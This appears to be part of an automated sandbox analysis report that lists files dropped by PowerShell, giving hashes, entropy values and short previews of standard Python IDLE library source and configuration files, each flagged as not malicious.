                                                                                                                                                                                                                      Size (bytes):11690
                                                                                                                                                                                                                      Entropy (8bit):4.391912818094907
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:DktPAfNk3gQXpSe82JCxtj2+ev6fYD3JShSXGFMThOndRe4V7qJJnY9xNOtdito7:DkBYkQQ892+y6gkDZC3JSQos
                                                                                                                                                                                                                      MD5:C02B4B83A2F6AC8E829C500AA6C12AE8
                                                                                                                                                                                                                      SHA1:DAB1055433BE4560CD5CAC644FF06AADB81F2C8F
                                                                                                                                                                                                                      SHA-256:8D93DBC7C9C3B356473ED21AE215C0BF372936966B2C26263CF52D0A35252DAF
                                                                                                                                                                                                                      SHA-512:0B446D2739D5951CE06A77CD1D00D8ED82006F1DF779403252D4AE19B52B5868A23321CE260B6C4425B9457F0D0ACCD77BB04CE6007E635598DC8C49BC4D0E27
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""codecontext - display the block context above the edit window....Once code has scrolled off the top of a window, it can be difficult to..determine which block you are in. This extension implements a pane at the top..of each IDLE edit window which provides block structure hints. These hints are..the lines which contain the block opening keywords, e.g. 'if', for the..enclosing block. The number of hint lines is determined by the maxlines..variable in the codecontext section of config-extensions.def. Lines which do..not open blocks are not shown in the context hints pane.....For EditorWindows, <<toggle-code-context>> is bound to CodeContext(self)...toggle_code_context_event..."""..import re..from sys import maxsize as INFINITY....from tkinter import Frame, Text, TclError..from tkinter.constants import NSEW, SUNKEN....from idlelib.config import idleConf....BLOCKOPENERS = {'class', 'def', 'if', 'elif', 'else', 'while', 'for',.. 'try', 'except', 'finally', 'with', 'asyn
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):15167
                                                                                                                                                                                                                      Entropy (8bit):4.586001417687266
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:D9GJr3ZOyhrQDU87jNb/cNcg/0ceK4ogOZ4a/zA/bZtL/MXdufFusVDSANC:QtZRrO6NcVs87QXdufFuoOA4
                                                                                                                                                                                                                      MD5:C387CE64E99B90C2F7DAB3F87A5C8ABF
                                                                                                                                                                                                                      SHA1:1E6AA7FD01A7744D34A0F35B8C4490E99E3840DA
                                                                                                                                                                                                                      SHA-256:CACED19F537821ECAE99736C8C4EFB8F879CDAF10B41E1035655F6503A4A4167
                                                                                                                                                                                                                      SHA-512:AAF4A460539B59C59D15B2CB3B2D506F03EB7FE45ACFCA87BF5138DF393D8D28EA93E94C298A48A5CABCF0471A289BF7F64D005296F8C37A6AF5DDC60436FD0C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import builtins..import keyword..import re..import time....from idlelib.config import idleConf..from idlelib.delegator import Delegator....DEBUG = False......def any(name, alternates):.. "Return a named group pattern matching list of alternates.".. return "(?P<%s>" % name + "|".join(alternates) + ")"......def make_pat():.. kw = r"\b" + any("KEYWORD", keyword.kwlist) + r"\b".. match_softkw = (.. r"^[ \t]*" + # at beginning of line + possible indentation.. r"(?P<MATCH_SOFTKW>match)\b" +.. r"(?![ \t]*(?:" + "|".join([ # not followed by ..... r"[:,;=^&|@~)\]}]", # a character which means it can't be a.. # pattern-matching statement.. r"\b(?:" + r"|".join(keyword.kwlist) + r")\b", # a keyword.. ]) +.. r"))".. ).. case_default = (.. r"^[ \t]*" + # at beginning of line + possible indentation.. r"(?P<CASE_SOFTKW>case)" +.. r"[ \t]+(?P<CASE_DEFAULT_UNDERSCORE>_\b)
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2328
                                                                                                                                                                                                                      Entropy (8bit):4.773243207934822
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:aZbNZ5xaeuGYGor8gXsH+7rg9icGJaLnF:aZxZ5xHor8CAOc99GUnF
                                                                                                                                                                                                                      MD5:D24339A6CEA4CA8AFD3F5AC805FE38A6
                                                                                                                                                                                                                      SHA1:DF44336D652375A34379880C6A2243BC25643B64
                                                                                                                                                                                                                      SHA-256:9A85CDDD234EBEF874603BE43931BA8E4DC472AB296BA7078B4070AE1D3BD111
                                                                                                                                                                                                                      SHA-512:D1005B91FFA825F23E2730AA5642B7F2389E55471C683D234A5883A84E1C08DFEFF49991BD16D55C667AEC85382DA238A074894F9BEF3C88E48FEE690D1FD546
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# config-extensions.def..#..# The following sections are for features that are no longer extensions...# Their options values are left here for back-compatibility.....[AutoComplete]..popupwait= 2000....[CodeContext]..maxlines= 15....[FormatParagraph]..max-width= 72....[ParenMatch]..style= expression..flash-delay= 500..bell= True....# IDLE reads several config files to determine user preferences. This..# file is the default configuration file for IDLE extensions settings...#..# Each extension must have at least one section, named after the..# extension module. This section must contain an 'enable' item (=True to..# enable the extension, =False to disable it), it may contain..# 'enable_editor' or 'enable_shell' items, to apply it only to editor ir..# shell windows, and may also contain any other general configuration..# items for the extension. Other True/False values will also be..# recognized as boolean by the Extension Configuration dialog...#..# Each extension must define at least o
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2969
                                                                                                                                                                                                                      Entropy (8bit):4.7625222504070415
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:aWVEAlwtx+NjBM+5HMFlwtx+NjBM+5HMeLkWE7+iyNf:B3+X+NNM+ZMF+X+NNM+ZMeQ37+iyNf
                                                                                                                                                                                                                      MD5:A5B241141D86EDCD6B931264E7BB9AC3
                                                                                                                                                                                                                      SHA1:D1D00D6C133B875AF8952C10414688B3DC112358
                                                                                                                                                                                                                      SHA-256:B196AA1F93DEE8419AC4014149DDE19C5D75F3EB650E5504C7E25EBB98DE36FB
                                                                                                                                                                                                                      SHA-512:BAA7E3258BD12AB119587FF4BC38302C72699C25E4F4D54683A149B7F67ACD8F4EA937AB7F8D2D7E890B5CC8BA283547D902BB09F26ABB4951BC30E670F6F337
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# IDLE reads several config files to determine user preferences. This..# file is the default config file for idle highlight theme settings.....[IDLE Classic]..normal-foreground= #000000..normal-background= #ffffff..keyword-foreground= #ff7700..keyword-background= #ffffff..builtin-foreground= #900090..builtin-background= #ffffff..comment-foreground= #dd0000..comment-background= #ffffff..string-foreground= #00aa00..string-background= #ffffff..definition-foreground= #0000ff..definition-background= #ffffff..hilite-foreground= #000000..hilite-background= gray..break-foreground= black..break-background= #ffff55..hit-foreground= #ffffff..hit-background= #000000..error-foreground= #000000..error-background= #ff7777..context-foreground= #000000..context-background= lightgray..linenumber-foreground= gray..linenumber-background= #ffffff..#cursor (only foreground can be set, restart IDLE)..cursor-foreground= black..#shell window..stdout-foreground= blue..stdout-background= #ffffff..stderr-foregro
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):11219
                                                                                                                                                                                                                      Entropy (8bit):4.879940823276725
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:cfxTwAptBN+9YVJDN7mMjPlmgxlNWWyhNylz3GwNt26NK:cfxMcBN+CDN7mMRxlNW9NuyQtPNK
                                                                                                                                                                                                                      MD5:499598F9ECBF866D52829DF910BB0D2E
                                                                                                                                                                                                                      SHA1:7444B2C45BA99CB14F0C79ABDEE9F5A87525E2A8
                                                                                                                                                                                                                      SHA-256:7FF9CAFAF6DEBBA83DD4D0F1CF983F0CE4C2C741D5601C63BF58F8A968546073
                                                                                                                                                                                                                      SHA-512:D30130F70C1525EAE2EDBE6E3DB7A1CC7776E9AFB29F99DC7A74D8DC0C7E2B5F7B012BD4F09C112D631C3FC8EEA3E3A543A2E478E3B12341703535B9E80F97F0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# IDLE reads several config files to determine user preferences. This..# file is the default config file for idle key binding settings...# Where multiple keys are specified for an action: if they are separated..# by a space (eg. action=<key1> <key2>) then the keys are alternatives, if..# there is no space (eg. action=<key1><key2>) then the keys comprise a..# single 'emacs style' multi-keystoke binding. The tk event specifier 'Key'..# is used in all cases, for consistency in auto key conflict checking in the..# configuration gui.....[IDLE Classic Windows]..copy=<Control-Key-c> <Control-Key-C>..cut=<Control-Key-x> <Control-Key-X>..paste=<Control-Key-v> <Control-Key-V>..beginning-of-line= <Key-Home>..center-insert=<Control-Key-l> <Control-Key-L>..close-all-windows=<Control-Key-q> <Control-Key-Q>..close-window=<Alt-Key-F4> <Meta-Key-F4>..do-nothing=<Control-Key-F12>..end-of-file=<Control-Key-d> <Control-Key-D>..python-docs=<Key-F1>..python-context-help=<Shift-Key-F1>..history-next=<Alt-Ke
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3261
                                                                                                                                                                                                                      Entropy (8bit):4.776444715728784
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:BR4Mvn0rhYhlP+W9V8g1D/dGv0eG35QbujSx:EMvn8YhlmW9CDvDK6yjSx
                                                                                                                                                                                                                      MD5:D25B729D127A92EE1C53A261D284F480
                                                                                                                                                                                                                      SHA1:E921FD4D2C7CF83ED84A664AAD3F9B9256FB2FF9
                                                                                                                                                                                                                      SHA-256:7C78E90964033D608D7C27364DC4504C25D4CDE1DEDDA47B800353085EF6F587
                                                                                                                                                                                                                      SHA-512:9C6FEA1BC4752D76548BB42725C62E052C42E5CD3A8E0F419F2D5FB353B6CDBBE56668F74B311349AADDB9F4D7E0943618C3B82C05032D97B0BDBCAF812E5B11
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# IDLE reads several config files to determine user preferences. This..# file is the default config file for general idle settings...#..# When IDLE starts, it will look in..# the following two sets of files, in order:..#..# default configuration files in idlelib..# --------------------------------------..# config-main.def default general config file..# config-extensions.def default extension config file..# config-highlight.def default highlighting config file..# config-keys.def default keybinding config file..#..# user configuration files in ~/.idlerc..# -------------------------------------..# config-main.cfg user general config file..# config-extensions.cfg user extension config file..# config-highlight.cfg user highlighting config file..# config-keys.cfg user keybinding config file..#..# On Windows, the default location of the home directory ('~' above)..# depends on the version. For Windows
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):39303
                                                                                                                                                                                                                      Entropy (8bit):4.5124931144674925
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:A6QyLctYZqCBN/weYLxzLLgQ3zfl3AcppI1T35Ll0Yg6Ia6i6zKX7:0+EqDYL9Hjlw+zU
                                                                                                                                                                                                                      MD5:DF2806FFD228FDD38973F6E1EAECA5BA
                                                                                                                                                                                                                      SHA1:2BDE138727CA4FE160C501289AE464DF0D8E4256
                                                                                                                                                                                                                      SHA-256:F9C5AE200985E6F664C1ABFF6F0493D9770AA3068D0865154249E5D29A719B31
                                                                                                                                                                                                                      SHA-512:6EF97939D8A4045F7F4FAF75E69AAC8906661403F27E781C666B40EE85B953D178ADD86EE27DC63BFF5A27EC8C9EAC74EF5CE0D22FF51E5E2A2135CB0F778929
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""idlelib.config -- Manage IDLE configuration information.....The comments at the beginning of config-main.def describe the..configuration files and the design implemented to update user..configuration information. In particular, user configuration choices..which duplicate the defaults will be removed from the user's..configuration files, and if a user file becomes empty, it will be..deleted.....The configuration database maps options to values. Conceptually, the..database keys are tuples (config-type, section, item). As implemented,..there are separate dicts for default and user values. Each has..config-type keys 'main', 'extensions', 'highlight', and 'keys'. The..value for each key is a ConfigParser instance that maps section and item..to values. For 'main' and 'extensions', user values override..default values. For 'highlight' and 'keys', user sections augment the..default sections (and must, therefore, have distinct names).....Throughout this module there is an emphasis on
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):15584
                                                                                                                                                                                                                      Entropy (8bit):4.609755690335863
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:AjW48vRhQVk0XSMzKTguLk/c8tCt93XsBWwNelN3:AjD3VxPwE+
                                                                                                                                                                                                                      MD5:5B67226E7A34ACA1084859A2DC88DC6F
                                                                                                                                                                                                                      SHA1:39342F0BD76983721738E87EF2D0A8728CCE7D61
                                                                                                                                                                                                                      SHA-256:00BC58751F927ECF96C7639BDAEE3465230A62904F1422E2D6FCCDEEA85D6836
                                                                                                                                                                                                                      SHA-512:B357D9F5D5932864F34E13A3B2C7A0FC76DCBB6CC403F9E8C1F0F090BCBD560D59BC3A224B2E05A5B95C5386AB01FF99361B444A3794CA34EADA888CE3568F22
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""..Dialog for building Tkinter accelerator key bindings.."""..from tkinter import Toplevel, Listbox, StringVar, TclError..from tkinter.ttk import Frame, Button, Checkbutton, Entry, Label, Scrollbar..from tkinter import messagebox..from tkinter.simpledialog import _setup_dialog..import string..import sys......FUNCTION_KEYS = ('F1', 'F2' ,'F3' ,'F4' ,'F5' ,'F6',.. 'F7', 'F8' ,'F9' ,'F10' ,'F11' ,'F12')..ALPHANUM_KEYS = tuple(string.ascii_lowercase + string.digits)..PUNCTUATION_KEYS = tuple('~!@#%^&*()_-+={}[]|;:,.<>/?')..WHITESPACE_KEYS = ('Tab', 'Space', 'Return')..EDIT_KEYS = ('BackSpace', 'Delete', 'Insert')..MOVE_KEYS = ('Home', 'End', 'Page Up', 'Page Down', 'Left Arrow',.. 'Right Arrow', 'Up Arrow', 'Down Arrow')..AVAILABLE_KEYS = (ALPHANUM_KEYS + PUNCTUATION_KEYS + FUNCTION_KEYS +.. WHITESPACE_KEYS + EDIT_KEYS + MOVE_KEYS)......def translate_key(key, modifiers):.. "Translate from keycap symbol to the Tkinter keysym.".. mapping =
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):107722
                                                                                                                                                                                                                      Entropy (8bit):4.604958802933583
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:8w+0Pu0NvLiRdXpDd78w0vbzLGxJ+iTk6LL:TrNWR06
                                                                                                                                                                                                                      MD5:DF220FA1A6B11C2DD4F13CCC6F8A88F3
                                                                                                                                                                                                                      SHA1:978A5C94635DE44826312E4E478F0FD7FD38000A
                                                                                                                                                                                                                      SHA-256:EA6DAA65C8EF93BE96C7029A77B0C0CF3C50E7B234D829FE1379634372B415E1
                                                                                                                                                                                                                      SHA-512:F2BC5C45176B9F75CD74C18D7A4EBD071384CADBBEE27F31250AE209CBC3CAC2C2A82D2870743A9ABAC2C9972B848C825AC45C9377974E99FE5927AA326AC14B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""IDLE Configuration Dialog: support user customization of IDLE by GUI....Customize font faces, sizes, and colorization attributes. Set indentation..defaults. Customize keybindings. Colorization and keybindings can be..saved as user defined sets. Select startup options including shell/editor..and default window size. Define additional help sources.....Note that tab width in IDLE is currently fixed at eight due to Tk issues...Refer to comments in EditorWindow autoindent code for details....."""..import re....from tkinter import (Toplevel, Listbox, Canvas,.. StringVar, BooleanVar, IntVar, TRUE, FALSE,.. TOP, BOTTOM, RIGHT, LEFT, SOLID, GROOVE,.. NONE, BOTH, X, Y, W, E, EW, NS, NSEW, NW,.. HORIZONTAL, VERTICAL, ANCHOR, ACTIVE, END, TclError)..from tkinter.ttk import (Frame, LabelFrame, Button, Checkbutton, Entry, Label,.. OptionMenu, Notebook, Radiobutton, Scrollbar, Style,..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):21593
                                                                                                                                                                                                                      Entropy (8bit):4.420519856853735
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:yxaVFlmEmNKFt4faOSwTsaurxsP8gyKb39hIEsmdaAgBg0xvvV0hQbQ9Q:yxaVFyNjZTb3zIEsz0hQbB
                                                                                                                                                                                                                      MD5:A1B3A4F326828AB502716A9C0BB0690B
                                                                                                                                                                                                                      SHA1:E5DCB07E2C444CA92F86CB4C8DB334A09E82E8F6
                                                                                                                                                                                                                      SHA-256:C2A17354BE31A1021BDA532F04F4D21EC7F57D8DFF9AF13E679ECDD852984E3D
                                                                                                                                                                                                                      SHA-512:68CA4616C7DC8A8D3110E4405C54EADCABEBBB1191C3DE18DB4B544309F93CD664B7176C0D9E1A51B40E9CD3F973FEA8F4A14EF355912F67F00E7D9A98B48389
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Debug user code with a GUI interface to a subclass of bdb.Bdb.....The Idb idb and Debugger gui instances each need a reference to each..other or to an rpc proxy for each other.....If IDLE is started with '-n', so that user code and idb both run in the..IDLE process, Debugger is called without an idb. Debugger.__init__..calls Idb with its incomplete self. Idb.__init__ stores gui and gui..then stores idb.....If IDLE is started normally, so that user code executes in a separate..process, debugger_r.start_remote_debugger is called, executing in the..IDLE process. It calls 'start the debugger' in the remote process,..which calls Idb with a gui proxy. Then Debugger is called in the IDLE..for more..."""....import bdb..import os....from tkinter import *..from tkinter.ttk import Frame, Scrollbar....from idlelib import macosx..from idlelib.scrolledlist import ScrolledList..from idlelib.window import ListedToplevel......class Idb(bdb.Bdb):.. "Supply user_line and user_exception function
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):12505
                                                                                                                                                                                                                      Entropy (8bit):4.620306422798499
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:iK381Qdy8zbgdznXXOnT37PoQNS+g6NJ7OBcXF4PELn4Jz4+JX0:p381QdtE+nT3LaxBcXF4K
                                                                                                                                                                                                                      MD5:7BCAC68F3CB180E230B9F0CCC9BF559C
                                                                                                                                                                                                                      SHA1:0EE5E3EE45F02AF6193978FD9B7F9D50C7CB66FE
                                                                                                                                                                                                                      SHA-256:A6993114BC2BEEC73984EBB74329B7346E455AF8AFB5AE8B8AA0F3EB9BC3B5D5
                                                                                                                                                                                                                      SHA-512:87B8811A71C9DCCB86864CE5B5C8122D2A3B78687BE2C51076CCDA29AA4B55D5C7A83B71891C878103700F30D22A2555745CAE088E8495995006D5485DB07289
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Support for remote Python debugging.....Some ASCII art to describe the structure:.... IN PYTHON SUBPROCESS # IN IDLE PROCESS.. #.. # oid='gui_adapter'.. +----------+ # +------------+ +-----+.. | GUIProxy |--remote#call-->| GUIAdapter |--calls-->| GUI |..+-----+--calls-->+----------+ # +------------+ +-----+..| Idb | # /..+-----+<-calls--+------------+ # +----------+<--calls-/.. | IdbAdapter |<--remote#call--| IdbProxy |.. +------------+ # +----------+.. oid='idb_adapter' #....The purpose of the Proxy and Adapter classes is to translate certain..arguments and return values that cannot be transported through the RPC..barrier, in particular frame and traceback objects....."""
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4323
                                                                                                                                                                                                                      Entropy (8bit):4.572557874139851
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:xHn5Btk7Au5GhjF/nFeEX9Gy1dj3CU+UcHfXo:A5GhB/VX9GwcUUY
                                                                                                                                                                                                                      MD5:318504C92CEEC5E93FFFE9529C6BEB53
                                                                                                                                                                                                                      SHA1:4FA8399AF5B67836DEF8BA86B2B14EBCEBE12383
                                                                                                                                                                                                                      SHA-256:1FCCD8335E8C3CE7CA07DFF376137B2DDEC41E477A84B422DF40E2EDD0D5B0BA
                                                                                                                                                                                                                      SHA-512:F1FF18284CF61BE064253EF236B0E87464167B08450EFEDF4B11297593CED736A95688B7EEAAC2DA73BE4C8256F4D88525AE601C863EB1F7B7B3210CF2AB63D7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Define tree items for debug stackviewer, which is only user..."""..# XXX TO DO:..# - popup menu..# - support partial or total redisplay..# - more doc strings..# - tooltips....# object browser....# XXX TO DO:..# - for classes/modules, add "open source" to object browser..from reprlib import Repr....from idlelib.tree import TreeItem, TreeNode, ScrolledCanvas....myrepr = Repr()..myrepr.maxstring = 100..myrepr.maxother = 100....class ObjectTreeItem(TreeItem):.. def __init__(self, labeltext, object_, setfunction=None):.. self.labeltext = labeltext.. self.object = object_.. self.setfunction = setfunction.. def GetLabelText(self):.. return self.labeltext.. def GetText(self):.. return myrepr.repr(self.object).. def GetIconName(self):.. if not self.IsExpandable():.. return "python".. def IsEditable(self):.. return self.setfunction is not None.. def SetText(self, text):.. try:.. value = eval(text).
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1123
                                                                                                                                                                                                                      Entropy (8bit):4.660105891263558
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1ddrrChkIZhjlVtVYAHAhJLjrAAZbEAbw8hJLLJf41ag:pr+hkIZhjjtqYADj8oA0w8D9fOag
                                                                                                                                                                                                                      MD5:C10E164177428126C730C943F07BB6F0
                                                                                                                                                                                                                      SHA1:A042B0A9B72F4FBD6259D6239358462804F44A3C
                                                                                                                                                                                                                      SHA-256:58B528EA4605D5F039442830286C80B4720DCC23B0339281DAB5DCCC14374936
                                                                                                                                                                                                                      SHA-512:1755DF3070444B2DA5D68819F9076D286E10BFFAC85B04B40949F69DFE6282A43E1A6571562F24C5E11511E0C959034398FEAA7374EBDE1EB6998AC26FD16643
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from idlelib import rpc....def remote_object_tree_item(item):.. wrapper = WrappedObjectTreeItem(item).. oid = id(wrapper).. rpc.objecttable[oid] = wrapper.. return oid....class WrappedObjectTreeItem:.. # Lives in PYTHON subprocess.... def __init__(self, item):.. self.__item = item.... def __getattr__(self, name):.. value = getattr(self.__item, name).. return value.... def _GetSubList(self):.. sub_list = self.__item._GetSubList().. return list(map(remote_object_tree_item, sub_list))....class StubObjectTreeItem:.. # Lives in IDLE process.... def __init__(self, sockio, oid):.. self.sockio = sockio.. self.oid = oid.... def __getattr__(self, name):.. value = rpc.MethodProxy(self.sockio, self.oid, name).. return value.... def _GetSubList(self):.. sub_list = self.sockio.remotecall(self.oid, "_GetSubList", (), {}).. return [StubObjectTreeItem(self.sockio, oid) for oid in sub_list]..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1078
                                                                                                                                                                                                                      Entropy (8bit):4.236520183483147
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:u3ArKzKxBAxqJONbNoBKzA6QiiCg6l9CObNozaU:u3WzpONb+4NF+zaU
                                                                                                                                                                                                                      MD5:68C37A2D5715F6963F15D4BE7A896A5B
                                                                                                                                                                                                                      SHA1:564D59322CDF6BC27F3433104D5D4EAADB3AD68A
                                                                                                                                                                                                                      SHA-256:699E43C46F1924A7BECB3137653C5260C4A913FA7563B899FD590CD47F68D963
                                                                                                                                                                                                                      SHA-512:CF4778154ED4D7D157335FF005A80AA18BC3D3527411091C19583D17DACEA20EFCF264AC76EA7A2D5B99F703F40AC343BFB39F20C7B11B8DD29DE1FB10C7573A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:class Delegator:.... def __init__(self, delegate=None):.. self.delegate = delegate.. self.__cache = set().. # Cache is used to only remove added attributes.. # when changing the delegate..... def __getattr__(self, name):.. attr = getattr(self.delegate, name) # May raise AttributeError.. setattr(self, name, attr).. self.__cache.add(name).. return attr.... def resetcache(self):.. "Removes added attributes while leaving original attributes.".. # Function is really about resetting delegator dict.. # to original state. Cache is just a means.. for key in self.__cache:.. try:.. delattr(self, key).. except AttributeError:.. pass.. self.__cache.clear().... def setdelegate(self, delegate):.. "Reset attributes and change delegate.".. self.resetcache().. self.delegate = delegate......if __name__ == '__main__':.. from uni
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2050
                                                                                                                                                                                                                      Entropy (8bit):4.772760119396098
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:Ld/h1LH6C4dAnBdyz6ace9C7dvkhN9ppr9LQQq4MbanVmYJ:Ld/z4EBvC9evmDq4Mbi
                                                                                                                                                                                                                      MD5:B74D7A29C7227AD175AC6A317FC5D3AD
                                                                                                                                                                                                                      SHA1:3EF485FD479ABAD0DB56A60B7E207A1005CBE416
                                                                                                                                                                                                                      SHA-256:F783FAC61FBA739A734520A3E80199AAC78FF90840020FC73B8E71E482AF494C
                                                                                                                                                                                                                      SHA-512:281706D8945FD6C734D643DBBB4A4128B98A98C5ADBFF5474BD77E91C7E27D050D36DCD5DEC3DCBF8238ABC54E5F3349D4A786A971AD5DB4338C154FFC633C72
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""..OptionMenu widget modified to allow dynamic menu reconfiguration..and setting of highlightthickness.."""..from tkinter import OptionMenu, _setit, StringVar, Button....class DynOptionMenu(OptionMenu):.. """Add SetMenu and highlightthickness to OptionMenu..... Highlightthickness adds space around menu button... """.. def __init__(self, master, variable, value, *values, **kwargs):.. highlightthickness = kwargs.pop('highlightthickness', None).. OptionMenu.__init__(self, master, variable, value, *values, **kwargs).. self['highlightthickness'] = highlightthickness.. self.variable = variable.. self.command = kwargs.get('command').... def SetMenu(self,valueList,value=None):.. """.. clear and reload the menu with a new set of options... valueList - list of new options.. value - initial value to set the optionmenu's menubutton to.. """.. self['menu'].delete(0,'end').. for item in valueList:..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):70913
                                                                                                                                                                                                                      Entropy (8bit):4.443774021858459
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:blPC9ohtpJnFL9tA/EZPRzZxWK03TKAL50qXwYqdN1ATzfXdK3qVPy0:blOoht7FL9tHPbb03T1Ck7h
                                                                                                                                                                                                                      MD5:0E8DF53D1A510DA09DADCF3DEA5605BF
                                                                                                                                                                                                                      SHA1:4854C8B3D6D2044DA51271746098A05C049C5864
                                                                                                                                                                                                                      SHA-256:FF960A36B2B01AA3D00D02268FF9EA85293C3E77BAD79B076B8CBB9C4FCA295B
                                                                                                                                                                                                                      SHA-512:7F31F0EFB2F79B07E397A45A8A01EE1481D7FD9D4E4D14FC7B38D5C3710F42933DC4DAC59659AF159ADD83E2CB0EEDDE32C2DA569FA810272E665ECB75440921
                                                                                                                                                                                                                      Malicious:false
